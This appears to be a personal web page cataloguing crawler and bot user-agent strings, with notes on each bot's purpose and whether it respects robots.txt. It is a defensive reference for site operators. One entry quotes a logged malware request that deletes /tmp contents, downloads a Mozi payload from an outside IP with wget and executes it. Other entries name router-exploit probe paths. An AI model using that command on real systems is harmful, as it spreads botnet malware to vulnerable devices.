Herr Bischoff's Bot Database

Please find below a manually curated and researched list of users agents I came across. It's impressive to see how many of the bots active today flat out do not respect robots.txt settings — or claim to do it but ignore them. This list is updated regularly, whenever I spot new user agents and look into their behavior. There is no JavaScript, here no fancy search.
Cmd-F and Ctrl-F work beautifully.

The information on this site is free as in beer. I take no responsibility for anything related to it and commercial use is explicitly forbidden. Meaning: you are not allowed to sell it, either separate or as part of a product. Otherwise it's public information. Please don't do anything stupid.

I'm always happy to hear from people this helped in some small way. If you feel like it, drop me a line: marcel@herrbischoff.com

AccompanyBot #

Notes
AI-driven relationship intelligence platform. Basically a sales tool.
Website
https://www.accompany.com

Data Mining Unknown if it respects robots.txt

Adsbot #

User Agent String
Mozilla/5.0 (compatible; Adsbot/3.1)
Notes
No public information available. All IPs point to webnx.com.

Suspicious Does not respect robots.txt

adscanner #

User Agent String
Mozilla/5.0 (compatible; adscanner/)/1.0 (http://seocompany.store; spider@seocompany.store)
Notes
Advertising technology company.
Website
http://seocompany.store

Advertising Unknown if it respects robots.txt

adstxt.com #

User Agent String
adstxt.com/1.2
Notes
Internet-wide crawl of ads.txt files.
Website
https://www.adstxt.com

Advertising Does not respect robots.txt

aiHitBot #

User Agent String
Mozilla/5.0 (compatible; aiHitBot/2.9; +https://www.aihitdata.com/about)
Notes
Company search engine.
Website
https://www.aihitdata.com/about

Search Respects robots.txt

aiohttp #

User Agent String
Python/3.7 aiohttp/3.0.9
Notes
Asynchronous HTTP Client/Server for asyncio and Python.
Website
https://docs.aiohttp.org/en/stable/

Automation Does not respect robots.txt

Ankit #

User Agent String
Ankit
Notes
Probably malware. Sends exclusively "POST /cgi-bin/ViewLog.asp HTTP/1.1" requests.

Malware Does not respect robots.txt

Applebot #

User Agent String
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)
Notes
Web crawler for Apple products like Siri and Spotlight Suggestions.
Website
http://www.apple.com/go/applebot

Search Respects robots.txt

archive.org_bot #

User Agent String
Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)
Notes
Archive.org Wayback Machine crawler. Ignores robots.txt, because "Over time we have observed that the robots.txt files that are geared toward search engine crawlers do not necessarily serve our archival purposes." (Source: https://blog.archive.org/2017/04/17/robots-txt-meant-for-search-engines-dont-work-well-for-web-archives)
Website
http://www.archive.org/details/archive.org_bot

Archival Does not respect robots.txt

AspiegelBot #

User Agent String
Mozilla/5.0 (compatible;AspiegelBot)
Notes
Chinese search engine operated by Huawei.
Website
https://aspiegel.com/about

Advertising Does not respect robots.txt

axios #

User Agent String
axios/0.19.0
Notes
Promise based HTTP client for the browser and node.js.
Website
https://github.com/axios/axios

Automation Does not respect robots.txt

Baiduspider #

User Agent String
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Notes
Major Chinese search engine. Ignores robots.txt despite them claiming otherwise.
Website
http://www.baidu.com/search/spider.html

Search Does not respect robots.txt

BananaBot #

User Agent String
BananaBot/0.6.1
Notes
No public information available.

Suspicious Does not respect robots.txt

Barkrowler #

User Agent String
Barkrowler/0.9 (+http://www.exensa.com/crawl)
Notes
French company specializing in large scale text data analysis.
Website
http://www.exensa.com/crawl/

Data Mining Respects robots.txt

bingbot #

User Agent String
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Notes
The Microsoft Bing search engine.
Website
http://www.bing.com/bingbot.htm

Search Respects robots.txt

Blackboard Safeassign #

User Agent String
Blackboard Safeassign
Notes
Anti-plagiarism service.

Legal Does not respect robots.txt

borneoBot #

User Agent String
borneoBot/0.6.7 (crawlcheck123@gmail.com)
Notes
No public information available.

Suspicious Does not respect robots.txt

botnet #

User Agent String
botnet/2.0
Notes
Malware trying to infect MIPS platforms.

Malware Does not respect robots.txt

BuiltWith #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/74.0.3729.131 Safari/537.36
Notes
BuiltWith website technology analysis.
Website
http://builtwith.com/biup

Data Mining Does not respect robots.txt

BW/1.1 #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/74.0.3729.131 Safari/537.36
Notes
BuiltWith website technology analysis.
Website
https://builtwith.com/biup

Data Mining Does not respect robots.txt

CATExplorador #

User Agent String
CATExplorador/1.0beta (sistemes at domini dot cat; http://domini.cat/catexplorador.html)
Notes
Domain intelligence tool of .cat NIC.
Website
http://domini.cat/catexplorador.html

Data Mining Does not respect robots.txt

CCBot #

User Agent String
CCBot/2.0 (https://commoncrawl.org/faq/)
Notes
Non-profit organization dedicated to providing a copy of the internet to internet researchers, companies and individuals at no cost for the purpose of research and analysis.
Website
https://commoncrawl.org/faq/

Data Mining Respects robots.txt

CheckHost #

User Agent String
CheckHost (https://check-host.net/)
Notes
Website monitoring service. Suspect if you didn't set this up yourself.
Website
https://check-host.net/

Automation Does not respect robots.txt

CheckMarkNetwork #

User Agent String
CheckMarkNetwork/1.0 (+http://www.checkmarknetwork.com/spider.html)
Notes
Intellectual Property and "Brand Protection" company.
Website
http://www.checkmarknetwork.com/spider.html

Legal Respects robots.txt

chimebot #

User Agent String
chimebot
Notes
No public description available.

Suspicious Does not respect robots.txt

Cincraw #

User Agent String
Mozilla/5.0 (compatible; Cincraw/1.0; +http://cincrawdata.net/bot/)
Notes
Chinese company performing unexplained operation of website data.
Website
http://cincrawdata.net/bot/

Data Mining Does not respect robots.txt

CISPA Webcrawler #

User Agent String
CISPA Webcrawler (https://vuln-notify-checker.cispa.saarland)
Notes
Security vulnerability scanner of the German Helmholtz-Zentrum for Information Security.
Website
https://vuln-notify-checker.cispa.saarland

Security Does not respect robots.txt

Clarabot #

User Agent String
Mozilla/5.0 (compatible; Clarabot/1.4; +http://www.clarabot.info/bots)
Notes
No public information available. Website defunct.
Website
http://www.clarabot.info/bots

Suspicious Respects robots.txt

Cliqzbot #

User Agent String
Mozilla/5.0 (compatible; Cliqzbot/3.0; +http://cliqz.com/company/cliqzbot)
Notes
Now-defunct web crawler of a german startup funded by major publishing house Hubert Burda. They used to sling "EU tech sovereignty" rhetoric while they existed. Despite claiming otherwise, it never fully respected robots.txt.
Website
http://cliqz.com/company/cliqzbot

Search Does not respect robots.txt

Cloud mapping experiment #

User Agent String
Cloud mapping experiment. Contact research@pdrlabs.net
Notes
No public information available. IPs are AWS instances.

Suspicious Does not respect robots.txt

CMS Crawler #

User Agent String
Mozilla/4.0 (CMS Crawler: http://www.cmscrawler.com)
Notes
Commercial technology insights company. They sell lists of who uses what technology on their websites.
Website
http://www.cmscrawler.com

Data Mining Does not respect robots.txt

coccocbot-image #

User Agent String
Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)
Notes
Vietnamese search engine.
Website
http://help.coccoc.com/searchengine

Search Respects robots.txt

coccocbot-web #

User Agent String
Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)
Notes
Vietnamese search engine.
Website
http://help.coccoc.com/searchengine

Search Respects robots.txt

CowBot #

User Agent String
CowBot/1.0
Notes
No public information available.

Suspicious Respects robots.txt

crawler4j #

User Agent String
crawler4j (https://github.com/yasserg/crawler4j/)
Notes
Open Source Web Crawler for Java.
Website
https://github.com/yasserg/crawler4j/

Automation Does not respect robots.txt

curb #

User Agent String
curb
Notes
No public information available.

Suspicious Does not respect robots.txt

curl #

User Agent String
curl/7.70.0
Notes
Command line tool and library for transferring data with URLs.
Website
https://curl.haxx.se

Automation Does not respect robots.txt

Datanyze #

User Agent String
Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Notes
"Technographics" and "Data Enrichment" company.
Website
https://www.datanyze.com

Data Mining Does not respect robots.txt

DF Bot #

User Agent String
DF Bot 1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

Dispatch #

User Agent String
Dispatch/0.14.0-SNAPSHOT
Notes
Scala wrapper for the Java AsyncHttpClient.
Website
https://dispatchhttp.org/

Automation Does not respect robots.txt

Domains Project #

User Agent String
Mozilla/5.0 (compatible; Domains Project/1.1.0; +https://domainsproject.org)
Notes
World’s single largest Internet domains dataset.
Website
https://domainsproject.org

Data Mining Does not respect robots.txt

DotBot #

User Agent String
Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)
Notes
Backlink analysis tool.
Website
http://www.opensiteexplorer.org/dotbot

SEO Respects robots.txt

drupalfinder #

User Agent String
drupalfinder1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Notes
No public information available.

Suspicious Does not respect robots.txt

DuckDuckBot-Https #

User Agent String
Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)
Notes
Web crawler for DuckDuckGo, a privacy-respecting search engine.
Website
https://duckduckgo.com/duckduckbot

Search Respects robots.txt

DuckDuckGo-Favicons-Bot #

User Agent String
Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)
Notes
Part of the DuckDuckGo search engine.
Website
http://duckduckgo.com

Search Does not respect robots.txt

eContext #

User Agent String
eContext/1.0 (eContext Classification Engine)
Notes
Text context classification service. Downloads robots.txt but ignores it.
Website
https://www.econtext.ai/

Data Mining Does not respect robots.txt

Elisabot #

User Agent String
Elisabot
Notes
No public information available.

Suspicious Does not respect robots.txt

User Agent String
eZ Publish Link Validator
Notes
Part of the eZ Publishing Platform by Ibexa.
Website
https://www.ibexa.co

Automation Does not respect robots.txt

FeedFetcher-Google #

User Agent String
FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)
Notes
Feedfetcher is how Google grabs RSS or Atom feeds for Google Play Newsstand and PubSubHubbub.
Website
http://www.google.com/feedfetcher.html

Search Does not respect robots.txt

finbot #

User Agent String
finbot
Notes
No public information available.

Suspicious Unknown if it respects robots.txt

GarlikCrawler #

User Agent String
GarlikCrawler/1.2 (http://garlik.com/, crawler@garlik.com)
Notes
No public information available. Website does not connect.
Website
http://garlik.com/

Suspicious Respects robots.txt

Googlebot #

User Agent String
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Notes
Google search engine crawler.
Website
http://www.google.com/bot.html

Search Respects robots.txt

HeadlessChrome #

User Agent String
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/68.0.3440.106 Safari/537.36
Notes
Developer tool, has no business visiting production websites of third parties.
Website
https://developers.google.com/web/updates/2017/04/headless-chrome

Automation Does not respect robots.txt

HealthCheckBot #

User Agent String
HealthCheckBot/0.2
Notes
No public information available.

Suspicious Does not respect robots.txt

Hello, world #

User Agent String
Hello, world
Notes
Anomalous user agent from a malware injection attempt sending "GET /shell?cd+/tmp;rm+-rf+*;wget+http://111.43.223.103:35300/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1".

Malware Does not respect robots.txt

heritrix #

User Agent String
Mozilla/5.0 (compatible; heritrix/3.4.0-20200304 +http://hbi640.ir/)
Notes
No public information available. Unreachable website. Heritrix is an open source web crawler designed for web archiving. It was written by the Internet Archive.
Website
http://hbi640.ir/

Archival Respects robots.txt

IndeedBot #

User Agent String
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 (IndeedBot 1.1)
Notes
No public information available.

Suspicious Does not respect robots.txt

Integrity #

User Agent String
Mozilla/5.0 (compatible; Integrity/8; +https://peacockmedia.software/mac/integrity/
Notes
Broken link checking software.
Website
https://peacockmedia.software/mac/integrity/

Automation Does not respect robots.txt

Internet-structure-research-project-bot #

User Agent String
Internet-structure-research-project-bot
Notes
No public information available. IPs based in Russia.

Suspicious Does not respect robots.txt

ips-agent #

User Agent String
Mozilla/5.0 (compatible; ips-agent)
Notes
No public information available.

Suspicious Unknown if it respects robots.txt

Java #

User Agent String
Java/1.8.0_211
Notes
Oracle Java built-in HTTP client library. Only lazy malicious developers never bother to change the default user agent string.
Website
https://www.java.com/en/

Automation Does not respect robots.txt

JobboerseBot #

User Agent String
Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0
Notes
Operated by XING for their job search and suggestion engine.
Website
http://www.jobboerse.com/bot.htm

Data Mining Unknown if it respects robots.txt

KOCMOHABT #

User Agent String
KOCMOHABT (https://kozmonavt.tk/) Mozilla/5.0 (Web Explorer)
Notes
No public information available. Website is an expired domain redirecting to junk.
Website
https://kozmonavt.tk/

Suspicious Does not respect robots.txt

LCC #

User Agent String
LCC (+http://corpora.informatik.uni-leipzig.de/crawler_faq.html)
Notes
A project of the Natural Language Processing Group of the University of Leipzig. The LCC offers access to monolingual dictionaries in more than 200 languages. Despite claiming otherwise, it does not respect robots.txt exclusions.
Website
http://corpora.informatik.uni-leipzig.de/crawler_faq.html

Data Mining Does not respect robots.txt

Leap #

User Agent String
Leap
Notes
No public information available.

Suspicious Does not respect robots.txt

Let's Encrypt validation server #

User Agent String
Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
Notes
Let's Encrypt certification authority. You probably initiated this yourself. Does not need to adhere to robots.txt since it's just verifying the domain to issue a TLS certificate, which is generally a user-initiated action.
Website
https://www.letsencrypt.org

Security Does not respect robots.txt

libwww-perl #

User Agent String
libwww-perl/6.43
Notes
Set of Perl modules which provides a simple and consistent application programming interface to the World-Wide Web.
Website
https://github.com/libwww-perl/libwww-perl

Automation Does not respect robots.txt

LightspeedSystemsCrawler #

User Agent String
LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Notes
Cloud-based content filter service.
Website
https://www.lightspeedsystems.com

Security Respects robots.txt

Linguee Bot #

User Agent String
Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
Notes
Search engine for translations in context. The examples on the site are collected by this crawler.
Website
http://www.linguee.com/bot

Search Respects robots.txt

ltx71 #

User Agent String
ltx71 - (http://ltx71.com/)
Notes
Security research bot.
Website
http://ltx71.com/

Security Respects robots.txt

lua-resty-http #

User Agent String
lua-resty-http/0.10 (Lua) ngx_lua/10000
Notes
Lua HTTP client cosocket driver for OpenResty / ngx_lua.
Website
https://github.com/ledgetech/lua-resty-http

Automation Does not respect robots.txt

Mail.RU_Bot #

User Agent String
Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)
Notes
Russian search engine. The crawler downloads robots.txt but ignores it.
Website
http://go.mail.ru/help/robots

Search Does not respect robots.txt

MauiBot #

User Agent String
MauiBot (crawler.feedback+wc@gmail.com)
Notes
No public information available.

Suspicious Respects robots.txt

MixrankBot #

User Agent String
Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)
Notes
Business intelligence platform.
Website
https://mixrank.com

Data Mining Does not respect robots.txt

MJ12bot #

User Agent String
Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
Notes
Majestic.com backlink crawler.
Website
http://mj12bot.com/

SEO Respects robots.txt

myseosnapshot #

User Agent String
myseosnapshot/1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

netEstate NE Crawler #

User Agent String
netEstate NE Crawler (+http://www.website-datenbank.de/)
Notes
German website indexer.
Website
http://www.website-datenbank.de/

Search Respects robots.txt

NetNewsWire #

User Agent String
NetNewsWire (RSS Reader; https://ranchero.com/netnewswire/)
Notes
Open source RSS feed reader.
Website
https://ranchero.com/netnewswire/

Automation Does not respect robots.txt

Nimbostratus-Bot #

User Agent String
Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)
Notes
No public information available.
Website
http://cloudsystemnetworks.com

Suspicious Does not respect robots.txt

oBot #

User Agent String
Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)
Notes
No public information available. Website is defunct.
Website
http://www.xforce-security.com/crawler/

Suspicious Does not respect robots.txt

OnalyticaBot #

User Agent String
OnalyticaBot
Notes
No public information available.

Suspicious Does not respect robots.txt

OrgProbe #

User Agent String
OrgProbe/2.0.0 (+http://www.blocked.org.uk)
Notes
Will check if a site is being blocked by running tests on major fixed line ISPs and mobile networks.
Website
http://www.blocked.org.uk

Data Mining Does not respect robots.txt

Pandalytics #

User Agent String
Pandalytics/1.0 (https://domainsbot.com/pandalytics/)
Notes
Business intelligence company.
Website
https://domainsbot.com/pandalytics/

SEO Respects robots.txt

Panscient #

User Agent String
Mozilla/5.0 (compatible; Panscient/1.0; +http://panscient.com/faq.htm)
Notes
Crawls the web looking for corporate information, such as company names, addresses, executive biographies, job openings and product information. Also crawls the web to locate genealogy pages, such as birth, marriage and death records, obituaries and census records.
Website
http://panscient.com/faq.htm

Data Mining Respects robots.txt

Pinterest #

User Agent String
Pinterest/0.2 (+https://www.pinterest.com/bot.html)
Notes
Pinterest crawls liked sites for signals that enable them to infer better recommendations, fight spam, and display useful information.
Website
https://www.pinterest.com/bot.html

Data Mining Respects robots.txt

Pinterestbot #

User Agent String
Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)
Notes
Pinterest crawls liked sites for signals that enable them to infer better recommendations, fight spam, and display useful information.
Website
http://www.pinterest.com/bot.html

Data Mining Respects robots.txt

Plukkie #

User Agent String
Mozilla/5.0 (compatible; Plukkie/1.6; http://www.botje.com/plukkie.htm)
Notes
Indexer for search engine botje.com. Bad search results, apparently abandoned.
Website
http://www.botje.com/plukkie.htm

Search Respects robots.txt

polaris botnet #

User Agent String
polaris botnet
Notes
Malware sending exclusively "POST /boaform/admin/formPing HTTP/1.1" requests.

Malware Does not respect robots.txt

python-requests #

User Agent String
python-requests/2.21.0
Notes
HTTP library for Python. Usually used by lazy scanners (script kiddies) and automated probing for obvious vulnerabilities.
Website
https://2.python-requests.org/en/master/

Automation Does not respect robots.txt

Qwantify #

User Agent String
Qwantify/1.0
Notes
European search engine based in France.
Website
https://help.qwant.com/bot

Search Respects robots.txt

Qwantify/Bleriot #

User Agent String
Mozilla/5.0 (compatible; Qwantify/Bleriot/1.1; +https://help.qwant.com/bot)
Notes
European search engine based in France.
Website
https://help.qwant.com/bot

Search Respects robots.txt

Researchscan #

User Agent String
Mozilla/5.0 zgrab/0.x (compatible; Researchscan/t12sns; +http://researchscan.comsys.rwth-aachen.de)
Notes
Internet-wide research study being conducted by computer scientists at RWTH Aachen University.
Website
http://researchscan.comsys.rwth-aachen.de

Security Does not respect robots.txt

RestSharp #

User Agent String
RestSharp/105.2.3.0
Notes
REST API client library for .NET. If you don't publish an API, this client has no business visiting a production website.
Website
https://restsharp.dev

Automation Does not respect robots.txt

Riddler #

User Agent String
Riddler (http://riddler.io/about)
Notes
Online research project which investigates algorithms for mapping the topology of the Internet. Riddler collects data about public systems via crawling and port mapping common ports.
Website
http://riddler.io/about

Data Mining Respects robots.txt

RobotsChecker #

User Agent String
RobotsChecker/0.6 (+http://www.blocked.org.uk)
Notes
Will check if a site is being blocked by running tests on major fixed line ISPs and mobile networks.
Website
http://www.blocked.org.uk

Data Mining Does not respect robots.txt

RyteBot #

User Agent String
RyteBot/1.0.0 (+https://bot.ryte.com/)
Notes
SEO company.
Website
https://en.ryte.com/bot/

SEO Unknown if it respects robots.txt

Scrapy #

User Agent String
Scrapy/1.7.2 (+https://scrapy.org)
Notes
Scraping framework for Python. Recommends changing the user agent, so only lazy developers don't do it.
Website
https://scrapy.org

Automation Unknown if it respects robots.txt

SearchAtlas.com SEO Crawler #

User Agent String
SearchAtlas.com SEO Crawler
Notes
SEO company.
Website
https://www.searchatlas.com

SEO Respects robots.txt

Seekport Crawler #

User Agent String
Mozilla/5.0 (compatible; Seekport Crawler; http://seekport.com/
Notes
Generic search engine based in Germany.
Website
http://seekport.com/

Search Unknown if it respects robots.txt

SemrushBot #

User Agent String
Mozilla/5.0 (compatible; SemrushBot/1.0~bm; +http://www.semrush.com/bot.html)
Notes
SEO company.
Website
http://www.semrush.com/bot.html

SEO Respects robots.txt

Semtix.cz #

User Agent String
Semtix.cz <https://semtix.cz/bot>
Website
https://semtix.cz/bot

SEO Does not respect robots.txt

SeoChecker #

User Agent String
Mozilla/5.0 (compatible; SeoChecker/1.1)
Notes
SEO company.
Website
https://seochecker.us

SEO Does not respect robots.txt

SeznamBot #

User Agent String
Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)
Notes
Czech search engine. Downloads but ignores robots.txt sometimes.
Website
http://napoveda.seznam.cz/en/seznambot-intro/

Search Does not respect robots.txt

shopify-partner-homepage-scraper #

User Agent String
shopify-partner-homepage-scraper
Notes
No public information available. Verified with Shopify that this is not a service of theirs.

Suspicious Does not respect robots.txt

SMTBot #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 (compatible; SMTBot/1.0; +http://www.similartech.com/smtbot)
Notes
Identified technologies used on websites.
Website
http://www.similartech.com/smtbot

Data Mining Does not respect robots.txt

Sophora #

User Agent String
Mozilla/5.0 (compatible; Sophora; http://www.subshell.com)
Notes
Part of the Sophora CMS system.
Website
http://www.subshell.com

Automation Does not respect robots.txt

special_archiver #

User Agent String
Mozilla/5.0 (compatible; special_archiver/3.1.1 +http://www.archive.org/details/archive.org_bot)
Notes
Archive.org Wayback Machine crawler. Ignores robots.txt, because "Over time we have observed that the robots.txt files that are geared toward search engine crawlers do not necessarily serve our archival purposes." (Source: https://blog.archive.org/2017/04/17/robots-txt-meant-for-search-engines-dont-work-well-for-web-archives)
Website
http://www.archive.org/details/archive.org_bot

Archival Does not respect robots.txt

spider #

User Agent String
spider
Notes
No public information available. The IPs logged are connected to financialbot.com, although the website is defunct. Mostly interested in pages with contact information.

Suspicious Does not respect robots.txt

Spider2.0 #

User Agent String
Spider2.0
Notes
No public information available.

Suspicious Does not respect robots.txt

SpiderLing #

User Agent String
Mozilla/5.0 (compatible; SpiderLing (a SPIDER for LINGustic research); +http://nlp.fi.muni.cz/projects/biwec/)
Notes
Linguistic research crawler.
Website
http://nlp.fi.muni.cz/projects/biwec/

Data Mining Respects robots.txt

SurdotlyBot #

User Agent String
Mozilla/5.0 (compatible; SurdotlyBot/1.0; +http://sur.ly/bot.html)
Notes
"Safe browsing" company.
Website
http://sur.ly/bot.html

Security Does not respect robots.txt

SWRLinkchecker #

User Agent String
SWRLinkchecker
Notes
Part of the online publishing infrastructure of german public broadcaster Südwestrundfunk.
Website
https://www.swr.de

Automation Does not respect robots.txt

TelegramBot #

User Agent String
TelegramBot (like TwitterBot)
Notes
Bots running on the Telegram network.
Website
https://telegram.org

Automation Does not respect robots.txt

Testcrawler #

User Agent String
Testcrawler
Notes
No public information available.

Suspicious Does not respect robots.txt

The Knowledge AI #

User Agent String
The Knowledge AI
Notes
No public information available.

Suspicious Respects robots.txt

TprAdsTxtCrawler #

User Agent String
TprAdsTxtCrawler/1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

tracemyfile #

User Agent String
Mozilla/5.0 (compatible; tracemyfile/1.0; +bot@tracemyfile.com)
Notes
Image usage tracking service.
Website
https://www.tracemyfile.com

Data Mining Does not respect robots.txt

TweetmemeBot #

User Agent String
Mozilla/5.0 (TweetmemeBot/4.0; +http://datasift.com/bot.html) Gecko/20100101 Firefox/31.0
Notes
Link expanding service.
Website
http://datasift.com/bot.html

Automation Does not respect robots.txt

Twingly Recon #

User Agent String
Mozilla/5.0 (compatible; Twingly Recon; twingly.com)
Notes
Social data mining company.
Website
https://www.twingly.com

Data Mining Respects robots.txt

UniversalFeedParser #

User Agent String
UniversalFeedParser/5.2.1 +https://code.google.com/p/feedparser/
Notes
Parses Atom and RSS feeds in Python.
Website
https://github.com/kurtmckee/feedparser

Automation Does not respect robots.txt

UptimeRobot #

User Agent String
Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)
Notes
Website monitoring service.
Website
http://www.uptimerobot.com/

Automation Does not respect robots.txt

VelenPublicWebCrawler #

User Agent String
Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)
Notes
Business intelligence company.
Website
https://hunter.io/robot

Data Mining Does not respect robots.txt

VsuSearchSpider #

User Agent String
VsuSearchSpider/1.0
Notes
No public information available.

Suspicious Respects robots.txt

W3C_Validator #

User Agent String
W3C_Validator/1.3 http://validator.w3.org/services
Notes
W3C validation services. Does not need to respect robots.txt since the request is always user-initiated.
Website
http://validator.w3.org/services

Automation Does not respect robots.txt

Wappalyzer #

User Agent String
Mozilla/5.0 (compatible; Wappalyzer)
Notes
"Technographics" data provider, uncovering technologies such as content management systems, customer relationship management, ecommerce platforms, advertising networks, marketing tools and analytics.
Website
https://www.wappalyzer.com

Data Mining Does not respect robots.txt

webtechbot #

User Agent String
Mozilla/5.0 (compatible; webtechbot; +https://www.webtechsurvey.com/bot)
Notes
Mines for used web technologies.
Website
https://www.webtechsurvey.com/bot

Data Mining Respects robots.txt

Wget #

User Agent String
Wget/1.20 (mingw32)
Notes
Free software package for retrieving files using HTTP, HTTPS, FTP and FTPS. Usually up to no good unless you explicitly host downloads that are to be automatically retrieved.
Website
https://www.gnu.org/software/wget/

Automation Does not respect robots.txt

Who.is Bot #

User Agent String
Who.is Bot
Notes
No public information available. Apparently belongs to site who.is but unclear what it does.
Website
https://who.is

Suspicious Does not respect robots.txt

WinHttp #

User Agent String
Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Notes
Windows built-in HTTP library. Usually up to no good.

Automation Does not respect robots.txt

woorankreview #

User Agent String
Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1 (compatible; woorankreview/2.0; +https://www.woorank.com/)
Notes
SEO company.
Website
https://www.woorank.com/

SEO Does not respect robots.txt

www.deadlinkchecker.com #

User Agent String
www.deadlinkchecker.com Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Notes
Dead link crawler.
Website
https://www.deadlinkchecker.com

Automation Does not respect robots.txt

User Agent String
Xenu Link Sleuth/1.3.8
Notes
Broken link checking software. Should only be used on one's own site.
Website
http://home.snafu.de/tilman/xenulink.html

Automation Does not respect robots.txt

XTC #

User Agent String
XTC
Notes
Malware exclusively sending the request "POST /cgi-bin/mainfunction.cgi HTTP/1.1".

Malware Does not respect robots.txt

yacybot #

User Agent String
yacybot (/global; amd64 Linux 5.7.4; java 1.8.0_201; America/en) http://yacy.net/bot.html
Notes
Peer-to-Peer web search engine.
Website
http://yacy.net/bot.html

Search Respects robots.txt

YandexBot #

User Agent String
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
Notes
Major Russian search engine. Downloads robots.txt but sometimes ignores it.
Website
http://yandex.com/bots

Advertising Does not respect robots.txt

YandexMobileBot #

User Agent String
Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)
Notes
Major Russian search engine. Downloads robots.txt but sometimes ignores it.
Website
http://yandex.com/bots

Search Does not respect robots.txt

Yeti #

User Agent String
Mozilla/5.0 (compatible; Yeti/1.1; +http://naver.me/spd)
Notes
Korean search engine Naver.
Website
http://naver.me/spd

Search Respects robots.txt

ZoominfoBot #

User Agent String
ZoominfoBot (zoominfobot at zoominfo dot com)
Notes
Business intelligence company.
Website
https://www.zoominfo.com

Data Mining Respects robots.txt